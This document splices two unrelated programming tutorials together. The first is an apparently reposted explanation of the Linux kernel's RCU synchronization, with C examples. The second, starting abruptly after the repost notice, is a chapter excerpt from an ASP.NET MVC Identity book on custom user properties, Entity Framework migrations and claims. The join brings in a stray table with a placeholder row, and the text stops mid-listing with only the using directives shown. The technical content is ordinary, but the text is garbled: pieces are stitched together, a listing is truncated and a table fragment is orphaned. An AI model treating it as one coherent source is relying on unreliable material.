RCU (Read-Copy Update) is a data synchronization mechanism that plays an important role in the current Linux kernel. RCU mainly targets linked lists, and its goal is to make read-side traversal efficient: readers take no expensive locks while walking the list, so many threads can read the list at the same time while one thread modifies it (the modifying thread still takes a lock). RCU therefore suits workloads that read data frequently but update it rarely. In a file system, for example, directory lookups happen constantly while directory modifications are comparatively rare; that is an ideal scenario for RCU.

The kernel source documents RCU fairly thoroughly; you can find the files under /Documentation/RCU/. Paul E. McKenney is the main author of the kernel's RCU implementation and has written many articles on the subject. This article walks through how the kernel's RCU mechanism works.

An RCU implementation mainly has to solve the following problems:

1. While one thread is reading, another thread deletes a node. The deleting thread may unlink the node from the list, but it must not destroy the node until every thread that may still be reading it has finished. RCU calls this waiting period the grace period.

2. While one thread is reading, another thread inserts a new node, and the reader happens to read that node; the reader must be guaranteed to see a complete node. This is where the publish-subscribe mechanism comes in.

3. Traversal must stay intact: inserting or deleting a node must never cause a concurrent traversal to break off in the middle of the list. RCU does not, however, guarantee that a reader will see a newly inserted node, or that it will not see a node that is about to be deleted.

Grace Period

The following example, adapted from one of Paul's articles, makes the concept easier to understand:

struct foo {
    int a;
    char b;
    long c;
};

DEFINE_SPINLOCK(foo_mutex);

struct foo *gbl_foo;

void foo_read(void)
{
    struct foo *fp = gbl_foo;

    if (fp != NULL)
        dosomething(fp->a, fp->b, fp->c);
}

void foo_update(struct foo *new_fp)
{
    spin_lock(&foo_mutex);
    struct foo *old_fp = gbl_foo;
    gbl_foo = new_fp;
    spin_unlock(&foo_mutex);
    kfree(old_fp);
}

This program operates on the global pointer gbl_foo. Suppose two threads run foo_read and foo_update concurrently: foo_read is preempted right after it copies gbl_foo into fp, the other thread runs foo_update to completion, and then foo_read resumes and calls dosomething. At that point fp points to memory that has already been freed, which can damage the system. To prevent this kind of event, RCU introduces a new concept called the grace period.

[Figure: timing of reader threads 1–6 relative to the grace period; not reproduced in this repost]

Each row in the figure represents a thread, and the bottom row is the deleting thread; after it completes the removal, it enters the grace period. The meaning of the grace period is that, after a deletion, the deleter must wait for all read-side threads that started before the grace period began to finish before it may destroy the element, because those threads may have read the element being deleted. In the figure, the grace period must wait for readers 1 and 2 to end. Reader 5 ended before the grace period began, so it needs no consideration; readers 3, 4, and 6 need none either, because a thread that starts after the grace period begins cannot read the already-deleted element. RCU provides an API for exactly this:

void foo_read(void)
{
    rcu_read_lock();
    struct foo *fp = gbl_foo;

    if (fp != NULL)
        dosomething(fp->a, fp->b, fp->c);
    rcu_read_unlock();
}

void foo_update(struct foo *new_fp)
{
    spin_lock(&foo_mutex);
    struct foo *old_fp = gbl_foo;
    gbl_foo = new_fp;
    spin_unlock(&foo_mutex);
    synchronize_rcu();
    kfree(old_fp);
}

foo_read gains rcu_read_lock and rcu_read_unlock, which mark the beginning and end of an RCU read-side critical section; in effect, they help detect whether the grace period has ended. foo_update gains a call to synchronize_rcu(): calling it marks the beginning of a grace period, and the function does not return until the grace period is over. Compare this with the figure again: threads 1 and 2 may have obtained the old gbl_foo (old_fp in foo_update) before synchronize_rcu was called, and calling kfree(old_fp) without waiting for them to finish could very well crash the system. Threads 3, 4, and 6 run after synchronize_rcu, by which time they can no longer obtain old_fp, so this kfree cannot affect them.

The grace period is the most complex part of any RCU implementation, because read-side performance must be improved without making deletion performance too poor.

Publish-Subscribe Mechanism

Most current compilers optimize code to some degree, and CPUs reorder the instructions they execute, all to improve execution efficiency; sometimes these optimizations produce unwanted results. For example:

void foo_update(struct foo *new_fp)
{
    spin_lock(&foo_mutex);
    struct foo *old_fp = gbl_foo;
    new_fp->a = 1;
    new_fp->b = 'b';
    new_fp->c = 100;
    gbl_foo = new_fp;
    spin_unlock(&foo_mutex);
    synchronize_rcu();
    kfree(old_fp);
}

We expect the three field assignments to new_fp to execute before the assignment gbl_foo = new_fp, but optimized code makes no such ordering guarantee. In that case a reader may well obtain new_fp while its members have not yet been assigned, and the call dosomething(fp->a, fp->b, fp->c) then receives indeterminate arguments, quite possibly producing unwanted results or even crashing the program. An optimization barrier solves the problem, and RCU wraps the barrier in a dedicated API. The publication of the pointer should therefore no longer be a plain assignment; it becomes:

rcu_assign_pointer(gbl_foo, new_fp);

The implementation of rcu_assign_pointer is fairly simple:

#define rcu_assign_pointer(p, v) \
    __rcu_assign_pointer((p), (v), __rcu)

#define __rcu_assign_pointer(p, v, space) \
    do { \
        smp_wmb(); \
        (p) = (typeof(v) __force space)(v); \
    } while (0)

As you can see, it merely places the write barrier smp_wmb() before the assignment to ensure the execution order. The __rcu annotation used in the macro only serves as a compile-time (sparse) check.

On DEC Alpha CPUs there is an even more aggressive optimization. Consider the reader:

void foo_read(void)
{
    rcu_read_lock();
    struct foo *fp = gbl_foo;

    if (fp != NULL)
        dosomething(fp->a, fp->b, fp->c);
    rcu_read_unlock();
}

The loads of fp->a, fp->b, and fp->c may be speculated before the load struct foo *fp = gbl_foo has completed. If this reader runs concurrently with foo_update, part of what is passed to dosomething may belong to the old gbl_foo and part to the new one, producing wrong results. To avoid this class of problem, RCU again provides a macro:

#define rcu_dereference(p) rcu_dereference_check(p, 0)

#define rcu_dereference_check(p, c) \
    __rcu_dereference_check((p), rcu_read_lock_held() || (c), __rcu)

#define __rcu_dereference_check(p, c, space) \
    ({ \
        typeof(*p) *_________p1 = (typeof(*p) *__force)ACCESS_ONCE(p); \
        rcu_lockdep_assert(c, "suspicious rcu_dereference_check()" \
                              " usage"); \
        rcu_dereference_sparse(p, space); \
        smp_read_barrier_depends(); \
        ((typeof(*p) __force __kernel *)(_________p1)); \
    })

static inline int rcu_read_lock_held(void)
{
    if (!debug_lockdep_rcu_enabled())
        return 1;
    if (rcu_is_cpu_idle())
        return 0;
    if (!rcu_lockdep_current_cpu_online())
        return 0;
    return lock_is_held(&rcu_lock_map);
}

This version carries debugging support; with the debug code removed it reduces to the following form, which is in fact the code from older kernel versions:

#define rcu_dereference(p) \
    ({ \
        typeof(p) _________p1 = p; \
        smp_read_barrier_depends(); \
        (_________p1); \
    })

A read barrier, smp_read_barrier_depends(), is inserted after the pointer is loaded. Changing the earlier pointer read to

struct foo *fp = rcu_dereference(gbl_foo);

prevents the problem described above.

Integrity of Data Reads

Once again, an example (illustrated by a figure in the original article) explains the problem. Suppose we insert a new node new in front of node A in the original list. The first step is to point new's next pointer at A; only the second step points the list head at new. Done in this order, completing the first step has no effect on concurrent traversals of the list, and after the second step a reader that reaches new can simply continue traversing. Done in the reverse order, with head pointed at new first, a thread that reads new while new's next pointer is still NULL can no longer reach A, B, and the following nodes. As noted above, RCU does not guarantee that a reader will see the new node; if that matters to the program, the caller must compensate. In a file system, for instance, if an RCU-based lookup fails to find the node, another form of lookup is performed; we will return to this when analyzing the file system code.
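To make the two-step ordering concrete, here is a minimal sketch of that insertion and of a lockless traversal, written against the primitives discussed above. The node layout and function names are illustrative, not from the original article, and updater-side locking (a spinlock, as in foo_update) is assumed but omitted:

struct node {
    int data;
    struct node *next;
};

static struct node *head;   /* list head; written only under the updater lock */

/* Updater: insert new_node in front of the current first node (A).
 * Step 1 links the fully initialized node to A; step 2 publishes it.
 * The write barrier inside rcu_assign_pointer() guarantees that a
 * reader that sees the new pointer also sees the node's contents. */
void insert_front(struct node *new_node, int value)
{
    new_node->data = value;
    new_node->next = head;              /* step 1: new -> A */
    rcu_assign_pointer(head, new_node); /* step 2: head -> new */
}

/* Reader: lockless traversal; it sees the list either with or without
 * the new node, but never a half-built one. */
int list_contains(int value)
{
    struct node *p;
    int found = 0;

    rcu_read_lock();
    for (p = rcu_dereference(head); p != NULL; p = rcu_dereference(p->next)) {
        if (p->data == value) {
            found = 1;
            break;
        }
    }
    rcu_read_unlock();
    return found;
}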
Now look at deleting a node. To delete B, we point A's next pointer at C while keeping B's own pointer intact, and the deleting code then enters grace-period detection. Because B's contents are unchanged, a reader currently at B can still continue through B to the following nodes. B cannot be destroyed immediately; it must wait until the grace period ends. And because A already points at C, every read that begins after the grace period starts finds C through A; B is hidden, and no later reader will see it. This ensures that destroying B after the grace period has no effect on the system.
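Under the same assumptions as the insertion sketch above (hand-rolled list, updater-side locking omitted), the deletion just described might look like this:

/* Updater: remove the node after a (call it B), wait out the grace
 * period, then free it. */
void delete_after(struct node *a)
{
    struct node *b = a->next;

    if (b == NULL)
        return;
    /* A -> C. B's own next pointer is left intact, so a reader that is
     * currently at B can still reach the rest of the list. */
    rcu_assign_pointer(a->next, b->next);
    synchronize_rcu();   /* wait for all pre-existing readers to finish */
    kfree(b);            /* no reader can reach B any more */
}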
Summary

The principle behind RCU is not complicated, and applying it is simple. Implementing it is not so easy, however; the difficulty concentrates in grace-period detection, and when we analyze the source code later we will see some extremely clever implementation techniques.

This article is a repost; the original (in Chinese) is at https://blog.csdn.net/m0_50662680/article/details/128449401.

Reposted article
Problem | Solution | Listing
... | ... | 1–3, 8–11
Update the database schema without deleting user data. | Perform a database migration. | 4–7
Perform fine-grained authorization. | Use claims. | 12–14
Add claims about a user. | Use the ClaimsIdentity.AddClaims method. | 15–19
Authorize access based on claim values. | Create a custom authorization filter attribute. | 20–21
Authenticate through a third party. | Install the NuGet package for the authentication provider, redirect requests to that provider, and specify a callback URL that creates the user account. | 22–25

15.1 Preparing the Example Project

In this chapter, I am going to continue working on the Users project I created in Chapter 13 and enhanced in Chapter 14. No changes to the application are required, but start the application and make sure that there are users in the database. Figure 15-1 shows the state of my database, which contains the users Admin, Alice, Bob, and Joe from the previous chapter. To check the users, start the application, request the /Admin/Index URL, and authenticate as the Admin user.

Figure 15-1. The initial users in the Identity database

I also need some roles for this chapter. I used the RoleAdmin controller to create roles called Users and Employees and assigned the users to those roles, as described in Table 15-2.

Table 15-2. The Roles and Their Members

Role | Members
Users | Alice, Joe
Employees | Alice, Bob

Figure 15-2 shows the required role configuration displayed by the RoleAdmin controller.

Figure 15-2. Configuring the roles required for this chapter

15.2 Adding Custom User Properties

When I created the AppUser class to represent users in Chapter 13, I noted that the base class defined a basic set of properties to describe the user, such as e-mail address and telephone number. Most applications need to store more information about users, including persistent application preferences and details such as addresses; in short, any data that is useful to running the application and that should last between sessions. In ASP.NET Membership, this was handled through the user profile system, but ASP.NET Identity takes a different approach.

Because the ASP.NET Identity system uses Entity Framework to store its data by default, defining additional user information is just a matter of adding properties to the user class and letting the Code First feature create the database schema required to store them. Table 15-3 puts custom user properties in context.
Table 15-3. Putting Custom User Properties in Context

Question | Answer
What is it? | Custom user properties allow you to store additional information about your users, including their preferences and settings.
Why should I care? | A persistent store of settings means that the user doesn't have to provide the same information each time they log in to the application.
How is it used by the MVC framework? | This feature isn't used directly by the MVC framework, but it is available for use in action methods.

15.2.1 Defining Custom Properties

Listing 15-1 shows how I added a simple property to the AppUser class to represent the city in which the user lives.

Listing 15-1. Adding a Property in the AppUser.cs File

using System;
using Microsoft.AspNet.Identity.EntityFramework;

namespace Users.Models {

    public enum Cities {
        LONDON, PARIS, CHICAGO
    }

    public class AppUser : IdentityUser {
        public Cities City { get; set; }
    }
}

I have defined an enumeration called Cities that defines values for some large cities and added a property called City to the AppUser class. To allow the user to view and edit their City property, I added actions to the Home controller, as shown in Listing 15-2.

Listing 15-2. Adding Support for Custom User Properties in the HomeController.cs File

using System.Web.Mvc;
using System.Collections.Generic;
using System.Web;
using System.Security.Principal;
using System.Threading.Tasks;
using Users.Infrastructure;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using Users.Models;

namespace Users.Controllers {

    public class HomeController : Controller {

        [Authorize]
        public ActionResult Index() {
            return View(GetData("Index"));
        }

        [Authorize(Roles = "Users")]
        public ActionResult OtherAction() {
            return View("Index", GetData("OtherAction"));
        }

        private Dictionary<string, object> GetData(string actionName) {
            Dictionary<string, object> dict = new Dictionary<string, object>();
            dict.Add("Action", actionName);
            dict.Add("User", HttpContext.User.Identity.Name);
            dict.Add("Authenticated", HttpContext.User.Identity.IsAuthenticated);
            dict.Add("Auth Type", HttpContext.User.Identity.AuthenticationType);
            dict.Add("In Users Role", HttpContext.User.IsInRole("Users"));
            return dict;
        }

        [Authorize]
        public ActionResult UserProps() {
            return View(CurrentUser);
        }

        [Authorize]
        [HttpPost]
        public async Task<ActionResult> UserProps(Cities city) {
            AppUser user = CurrentUser;
            user.City = city;
            await UserManager.UpdateAsync(user);
            return View(user);
        }

        private AppUser CurrentUser {
            get {
                return UserManager.FindByName(HttpContext.User.Identity.Name);
            }
        }

        private AppUserManager UserManager {
            get {
                return HttpContext.GetOwinContext().GetUserManager<AppUserManager>();
            }
        }
    }
}

I added a CurrentUser property that uses the AppUserManager class to retrieve an AppUser instance representing the current user. I pass the AppUser object as the view model object in the GET version of the UserProps action method, and the POST method uses it to update the value of the new City property. Listing 15-3 shows the UserProps.cshtml view, which displays the City property value and contains a form to change it.
Listing 15-3. The Contents of the UserProps.cshtml File in the Views/Home Folder

@using Users.Models
@model AppUser
@{ ViewBag.Title = "UserProps"; }

<div class="panel panel-primary">
    <div class="panel-heading">Custom User Properties</div>
    <table class="table table-striped">
        <tr><th>City</th><td>@Model.City</td></tr>
    </table>
</div>

@using (Html.BeginForm()) {
    <div class="form-group">
        <label>City</label>
        @Html.DropDownListFor(x => x.City, new SelectList(Enum.GetNames(typeof(Cities))))
    </div>
    <button class="btn btn-primary" type="submit">Save</button>
}

Caution: Don't start the application when you have created the view. In the sections that follow, I demonstrate how to preserve the contents of the database, and if you start the application now, the ASP.NET Identity users will be deleted.

15.2.2 Preparing for Database Migration

The default behavior for the Entity Framework Code First feature is to drop the tables in the database and re-create them whenever the classes that drive the schema have changed. You saw this in Chapter 14 when I added support for roles: When the application was started, the database was reset, and the user accounts were lost.

Don't start the application yet, but if you were to do so, you would see a similar effect. Deleting data during development is usually not a problem, but doing so in a production setting is usually disastrous, because it deletes all of the real user accounts and causes a panic while the backups are restored. In this section, I am going to demonstrate how to use the database migration feature, which updates a Code First schema in a less brutal manner and preserves the existing data it contains.

The first step is to issue the following command in the Visual Studio Package Manager Console:

Enable-Migrations -EnableAutomaticMigrations

This enables the database migration support and creates a Migrations folder in the Solution Explorer that contains a Configuration.cs class file, the contents of which are shown in Listing 15-4.

Listing 15-4. The Contents of the Configuration.cs File

namespace Users.Migrations {
    using System;
    using System.Data.Entity;
    using System.Data.Entity.Migrations;
    using System.Linq;

    internal sealed class Configuration
        : DbMigrationsConfiguration<Users.Infrastructure.AppIdentityDbContext> {

        public Configuration() {
            AutomaticMigrationsEnabled = true;
            ContextKey = "Users.Infrastructure.AppIdentityDbContext";
        }

        protected override void Seed(Users.Infrastructure.AppIdentityDbContext context) {
            // This method will be called after migrating to the latest version.
            // You can use the DbSet<T>.AddOrUpdate() helper extension method
            // to avoid creating duplicate seed data. E.g.
            //
            //   context.People.AddOrUpdate(
            //     p => p.FullName,
            //     new Person { FullName = "Andrew Peters" },
            //     new Person { FullName = "Brice Lambson" },
            //     new Person { FullName = "Rowan Miller" }
            //   );
        }
    }
}
Tip: You might be wondering why you are entering a database migration command into the console used to manage NuGet packages. The answer is that the Package Manager Console is really PowerShell, a general-purpose tool that is mislabeled by Visual Studio. You can use the console to issue a wide range of helpful commands. See http://go.microsoft.com/fwlink/?LinkID=108518 for details.

The class will be used to migrate existing content in the database to the new schema, and the Seed method will be called to provide an opportunity to update the existing database records. In Listing 15-5, you can see how I have used the Seed method to set a default value for the new City property I added to the AppUser class. (I have also updated the class file to reflect my usual coding style.)

Listing 15-5. Managing Existing Content in the Configuration.cs File

using System.Data.Entity.Migrations;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.EntityFramework;
using Users.Infrastructure;
using Users.Models;

namespace Users.Migrations {

    internal sealed class Configuration
        : DbMigrationsConfiguration<AppIdentityDbContext> {

        public Configuration() {
            AutomaticMigrationsEnabled = true;
            ContextKey = "Users.Infrastructure.AppIdentityDbContext";
        }

        protected override void Seed(AppIdentityDbContext context) {
            AppUserManager userMgr = new AppUserManager(new UserStore<AppUser>(context));
            AppRoleManager roleMgr = new AppRoleManager(new RoleStore<AppRole>(context));

            string roleName = "Administrators";
            string userName = "Admin";
            string password = "MySecret";
            string email = "admin@example.com";

            if (!roleMgr.RoleExists(roleName)) {
                roleMgr.Create(new AppRole(roleName));
            }
            AppUser user = userMgr.FindByName(userName);
            if (user == null) {
                userMgr.Create(new AppUser { UserName = userName, Email = email },
                    password);
                user = userMgr.FindByName(userName);
            }
            if (!userMgr.IsInRole(user.Id, roleName)) {
                userMgr.AddToRole(user.Id, roleName);
            }

            foreach (AppUser dbUser in userMgr.Users) {
                dbUser.City = Cities.PARIS;
            }
            context.SaveChanges();
        }
    }
}

You will notice that much of the code I added to the Seed method is taken from the IdentityDbInit class, which I used to seed the database with an administration user in Chapter 14. This is because the new Configuration class added to support database migrations will replace the seeding function of the IdentityDbInit class, which I'll update shortly. Aside from ensuring that there is an admin user, the important statements in the Seed method are the ones that set the initial value for the City property I added to the AppUser class, as follows:

...
foreach (AppUser dbUser in userMgr.Users) {
    dbUser.City = Cities.PARIS;
}
context.SaveChanges();
...
You don't have to set a default value for new properties; I just wanted to demonstrate that the Seed method in the Configuration class can be used to update the existing user records in the database.

Caution: Be careful when setting values for properties in the Seed method in real projects, because the values will be applied every time you change the schema, overriding any values that the user has set since the last schema update was performed. I set the value of the City property just to demonstrate that it can be done.

Changing the Database Context Class

The reason I added the seeding code to the Configuration class is that I need to change the IdentityDbInit class. At present, the IdentityDbInit class is derived from the descriptively named DropCreateDatabaseIfModelChanges<AppIdentityDbContext> class, which, as you might imagine, drops the entire database when the Code First classes change. Listing 15-6 shows the changes I made to the IdentityDbInit class to prevent it from affecting the database.

Listing 15-6. Preventing Database Schema Changes in the AppIdentityDbContext.cs File

using System.Data.Entity;
using Microsoft.AspNet.Identity.EntityFramework;
using Users.Models;
using Microsoft.AspNet.Identity;

namespace Users.Infrastructure {

    public class AppIdentityDbContext : IdentityDbContext<AppUser> {

        public AppIdentityDbContext() : base("IdentityDb") { }

        static AppIdentityDbContext() {
            Database.SetInitializer<AppIdentityDbContext>(new IdentityDbInit());
        }

        public static AppIdentityDbContext Create() {
            return new AppIdentityDbContext();
        }
    }

    public class IdentityDbInit : NullDatabaseInitializer<AppIdentityDbContext> {
    }
}

I have removed the methods defined by the class and changed its base to NullDatabaseInitializer<AppIdentityDbContext>, which prevents the schema from being altered.

15.2.3 Performing the Migration

All that remains is to generate and apply the migration. First, run the following command in the Package Manager Console:

Add-Migration CityProperty

This creates a new migration called CityProperty (I like my migration names to reflect the changes I made). A new class file will be added to the Migrations folder, and its name reflects the time at which the command was run and the name of the migration; my file is called 201402262244036_CityProperty.cs, for example. The contents of this file describe how Entity Framework will change the database during the migration, as shown in Listing 15-7.

Listing 15-7. The Contents of the 201402262244036_CityProperty.cs File
namespace Users.Migrations {
    using System;
    using System.Data.Entity.Migrations;

    public partial class Init : DbMigration {

        public override void Up() {
            AddColumn("dbo.AspNetUsers", "City", c => c.Int(nullable: false));
        }

        public override void Down() {
            DropColumn("dbo.AspNetUsers", "City");
        }
    }
}

The Up method describes the changes that have to be made to the schema when the database is upgraded, which in this case means adding a City column to the AspNetUsers table, the table used to store user records in the ASP.NET Identity database.

The final step is to perform the migration. Without starting the application, run the following command in the Package Manager Console:

Update-Database -TargetMigration CityProperty

The database schema will be modified, and the code in the Configuration.Seed method will be executed. The existing user accounts will have been preserved and enhanced with a City property (which I set to Paris in the Seed method).

15.2.4 Testing the Migration

To test the effect of the migration, start the application, navigate to the /Home/UserProps URL, and authenticate as one of the Identity users (for example, as Alice with the password MySecret). Once authenticated, you will see the current value of the City property for the user and have the opportunity to change it, as shown in Figure 15-3.

Figure 15-3. Displaying and changing a custom user property

15.2.5 Defining an Additional Property

Now that database migrations are set up, I am going to define a further property, both to demonstrate how subsequent changes are handled and to show a more useful (and less dangerous) example of using the Configuration.Seed method. Listing 15-8 shows how I added a Country property to the AppUser class.

Listing 15-8. Adding Another Property in the AppUserModels.cs File

using System;
using Microsoft.AspNet.Identity.EntityFramework;

namespace Users.Models {

    public enum Cities {
        LONDON, PARIS, CHICAGO
    }

    public enum Countries {
        NONE, UK, FRANCE, USA
    }

    public class AppUser : IdentityUser {

        public Cities City { get; set; }
        public Countries Country { get; set; }

        public void SetCountryFromCity(Cities city) {
            switch (city) {
                case Cities.LONDON:
                    Country = Countries.UK;
                    break;
                case Cities.PARIS:
                    Country = Countries.FRANCE;
                    break;
                case Cities.CHICAGO:
                    Country = Countries.USA;
                    break;
                default:
                    Country = Countries.NONE;
                    break;
            }
        }
    }
}

I have added an enumeration to define the country names and a helper method that selects a country value based on the City property. Listing 15-9 shows the change I made to the Configuration class so that the Seed method sets the Country property based on the City, but only if the value of Country is NONE (which it will be for all users when the database is migrated, because Entity Framework sets enumeration columns to the first value).
Listing 15-9. Modifying the Database Seed in the Configuration.cs File

using System.Data.Entity.Migrations;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.EntityFramework;
using Users.Infrastructure;
using Users.Models;

namespace Users.Migrations {

    internal sealed class Configuration
        : DbMigrationsConfiguration<AppIdentityDbContext> {

        public Configuration() {
            AutomaticMigrationsEnabled = true;
            ContextKey = "Users.Infrastructure.AppIdentityDbContext";
        }

        protected override void Seed(AppIdentityDbContext context) {
            AppUserManager userMgr = new AppUserManager(new UserStore<AppUser>(context));
            AppRoleManager roleMgr = new AppRoleManager(new RoleStore<AppRole>(context));

            string roleName = "Administrators";
            string userName = "Admin";
            string password = "MySecret";
            string email = "admin@example.com";

            if (!roleMgr.RoleExists(roleName)) {
                roleMgr.Create(new AppRole(roleName));
            }
            AppUser user = userMgr.FindByName(userName);
            if (user == null) {
                userMgr.Create(new AppUser { UserName = userName, Email = email },
                    password);
                user = userMgr.FindByName(userName);
            }
            if (!userMgr.IsInRole(user.Id, roleName)) {
                userMgr.AddToRole(user.Id, roleName);
            }

            foreach (AppUser dbUser in userMgr.Users) {
                if (dbUser.Country == Countries.NONE) {
                    dbUser.SetCountryFromCity(dbUser.City);
                }
            }
            context.SaveChanges();
        }
    }
}

This kind of seeding is more useful in a real project because it will set a value for the Country property only if one has not already been set; subsequent migrations won't be affected, and user selections won't be lost.

1. Adding Application Support

There is no point defining additional user properties if they are not available in the application, so Listing 15-10 shows the change I made to the Views/Home/UserProps.cshtml file to display the value of the Country property.

Listing 15-10. Displaying an Additional Property in the UserProps.cshtml File

@using Users.Models
@model AppUser
@{ ViewBag.Title = "UserProps"; }

<div class="panel panel-primary">
    <div class="panel-heading">Custom User Properties</div>
    <table class="table table-striped">
        <tr><th>City</th><td>@Model.City</td></tr>
        <tr><th>Country</th><td>@Model.Country</td></tr>
    </table>
</div>

@using (Html.BeginForm()) {
    <div class="form-group">
        <label>City</label>
        @Html.DropDownListFor(x => x.City, new SelectList(Enum.GetNames(typeof(Cities))))
    </div>
    <button class="btn btn-primary" type="submit">Save</button>
}

Listing 15-11 shows the corresponding change I made to the Home controller to update the Country property when the City value changes.

Listing 15-11. Setting Custom Properties in the HomeController.cs File

using System.Web.Mvc;
using System.Collections.Generic;
using System.Web;
using System.Security.Principal;
using System.Threading.Tasks;
using Users.Infrastructure;
using Microsoft.AspNet.Identity;
using Microsoft.AspNet.Identity.Owin;
using Users.Models;

namespace Users.Controllers {

    public class HomeController : Controller {

        // ...other action methods omitted for brevity...
        [Authorize]
        public ActionResult UserProps() {
            return View(CurrentUser);
        }

        [Authorize]
        [HttpPost]
        public async Task<ActionResult> UserProps(Cities city) {
            AppUser user = CurrentUser;
            user.City = city;
            user.SetCountryFromCity(city);
            await UserManager.UpdateAsync(user);
            return View(user);
        }

        // ...properties omitted for brevity...
    }
}

2. Performing the Migration

All that remains is to create and apply a new migration. Enter the following command into the Package Manager Console:

Add-Migration CountryProperty

This will generate another file in the Migrations folder that contains the instruction to add the Country column. To apply the migration, execute the following command:

Update-Database -TargetMigration CountryProperty

The migration will be performed, and the value of the Country property will be set based on the value of the existing City property for each user. You can check the new user property by starting the application, authenticating, and navigating to the /Home/UserProps URL, as shown in Figure 15-4.

Figure 15-4. Creating an additional user property

Tip: Although I have focused on the process of upgrading the database, you can also migrate back to a previous version by specifying an earlier migration. Use the -Force argument to make changes that cause data loss, such as removing a column.
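To make that tip concrete: assuming the migrations created in this chapter, rolling the database back to the schema as it stood after the CityProperty migration would drop the Country column, a data-losing change, so the command needs -Force. A hypothetical invocation would look like this:

Update-Database -TargetMigration CityProperty -Force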
15.3 Working with Claims

In older user-management systems, such as ASP.NET Membership, the application was assumed to be the authoritative source of all information about the user, essentially treating the application as a closed world and trusting the data contained within it.

This approach is so ingrained in software development that it can be hard to recognize it for what it is, but you saw an example of the closed-world technique in Chapter 14 when I authenticated users against the credentials stored in the database and granted access based on the roles associated with those credentials. I did the same thing again in this chapter when I added properties to the user class. Every piece of information that I needed to manage user authentication and authorization came from within my application, and that is a perfectly satisfactory approach for many web applications, which is why I demonstrated these techniques in such depth.

ASP.NET Identity also supports an alternative approach for dealing with users, which works well when the MVC framework application isn't the sole source of information about users and which can be used to authorize users in more flexible and fluid ways than traditional roles allow.

This alternative approach uses claims, and in this section I'll describe how ASP.NET Identity supports claims-based authorization. Table 15-4 puts claims in context.

Table 15-4. Putting Claims in Context

Question | Answer
What is it? | Claims are pieces of information about users that you can use to make authorization decisions. Claims can be obtained from external systems as well as from the local Identity database.
Why should I care? | Claims can be used to flexibly authorize access to action methods. Unlike conventional roles, claims allow access to be driven by the information that describes the user.
How is it used by the MVC framework? | This feature isn't used directly by the MVC framework, but it is integrated into the standard authorization features, such as the Authorize attribute.

Tip: You don't have to use claims in your applications, and as Chapter 14 showed, ASP.NET Identity is perfectly happy to provide an application with authentication and authorization services without any need to understand claims at all.

15.3.1 Understanding Claims

A claim is a piece of information about the user, along with some information about where that information came from. The easiest way to unpack claims is through some practical demonstrations, without which any discussion becomes too abstract to be truly useful. To get started, I added a Claims controller to the example project, the definition of which you can see in Listing 15-12.

Listing 15-12. The Contents of the ClaimsController.cs File

using System.Security.Claims;
using System.Web;
using System.Web.Mvc;

namespace Users.Controllers {

    public class ClaimsController : Controller {

        [Authorize]
        public ActionResult Index() {
            ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;
            if (ident == null) {
                return View("Error", new string[] { "No claims available" });
            } else {
                return View(ident.Claims);
            }
        }
    }
}

Tip: You may feel a little lost as I define the code for this example. Don't worry about the details for the moment; just stick with it until you see the output from the action method and view that I define. More than anything else, that will help put claims into perspective.

You can get the claims associated with a user in different ways. One approach is to use the Claims property defined by the user class, but in this example, I have used the HttpContext.User.Identity property to demonstrate the way that ASP.NET Identity is integrated with the rest of the ASP.NET platform. As I explained in Chapter 13, the HttpContext.User.Identity property returns an implementation of the IIdentity interface, which is a ClaimsIdentity object when working with ASP.NET Identity.
The ClaimsIdentity class is defined in the System.Security.Claims namespace, and Table 15-5 shows the members it defines that are relevant to this chapter.

Table 15-5. The Members Defined by the ClaimsIdentity Class

Name | Description
Claims | Returns an enumeration of Claim objects representing the claims for the user.
AddClaim(claim) | Adds a claim to the user identity.
AddClaims(claims) | Adds an enumeration of Claim objects to the user identity.
HasClaim(predicate) | Returns true if the user identity contains a claim that matches the specified predicate. See the "Applying Claims" section for an example predicate.
RemoveClaim(claim) | Removes a claim from the user identity.

Other members are available, but the ones in the table are those used most often in web applications, for reasons that will become obvious as I demonstrate how claims fit into the wider ASP.NET platform.

In Listing 15-12, I cast the IIdentity implementation to the ClaimsIdentity type and pass the enumeration of Claim objects returned by the ClaimsIdentity.Claims property to the View method. A Claim object represents a single piece of data about the user, and the Claim class defines the properties shown in Table 15-6.

Table 15-6. The Properties Defined by the Claim Class

Name | Description
Issuer | Returns the name of the system that provided the claim.
Subject | Returns the ClaimsIdentity object for the user who the claim refers to.
Type | Returns the type of information that the claim represents.
Value | Returns the piece of information that the claim represents.
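Before moving on, here is a minimal, hypothetical fragment (not part of the book's example project) that exercises the members from Tables 15-5 and 15-6 inside an action method; it assumes only the standard System.Security.Claims API and the Employees role created earlier in the chapter:

ClaimsIdentity ident = HttpContext.User.Identity as ClaimsIdentity;
if (ident != null) {
    // Table 15-5: add a single claim to the identity
    ident.AddClaim(new Claim(ClaimTypes.StateOrProvince, "DC"));

    // Table 15-5: test for a claim using a predicate
    bool isEmployee = ident.HasClaim(c =>
        c.Type == ClaimTypes.Role && c.Value == "Employees");

    // Table 15-6: read the properties of each individual claim
    foreach (Claim claim in ident.Claims) {
        System.Diagnostics.Debug.WriteLine(
            "{0}: {1} = {2}", claim.Issuer, claim.Type, claim.Value);
    }
}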
Listing 15-13 shows the contents of the Index.cshtml file that I created in the Views/Claims folder and that is rendered by the Index action of the Claims controller. The view adds a row to a table for each claim about the user.

Listing 15-13. The Contents of the Index.cshtml File in the Views/Claims Folder

@using System.Security.Claims
@using Users.Infrastructure
@model IEnumerable<Claim>
@{ ViewBag.Title = "Claims"; }

<div class="panel panel-primary">
    <div class="panel-heading">Claims</div>
    <table class="table table-striped">
        <tr><th>Subject</th><th>Issuer</th><th>Type</th><th>Value</th></tr>
        @foreach (Claim claim in Model.OrderBy(x => x.Type)) {
            <tr>
                <td>@claim.Subject.Name</td>
                <td>@claim.Issuer</td>
                <td>@Html.ClaimType(claim.Type)</td>
                <td>@claim.Value</td>
            </tr>
        }
    </table>
</div>

The value of the Claim.Type property is a URI for a Microsoft schema, which isn't especially useful. The popular schemas are used as the values for fields in the System.Security.Claims.ClaimTypes class, so to make the output from the Index.cshtml view easier to read, I added an HTML helper to the IdentityHelpers.cs file, as shown in Listing 15-14. It is this helper that I use in the Index.cshtml file to format the value of the Claim.Type property.

Listing 15-14. Adding a Helper to the IdentityHelpers.cs File

using System.Web;
using System.Web.Mvc;
using Microsoft.AspNet.Identity.Owin;
using System;
using System.Linq;
using System.Reflection;
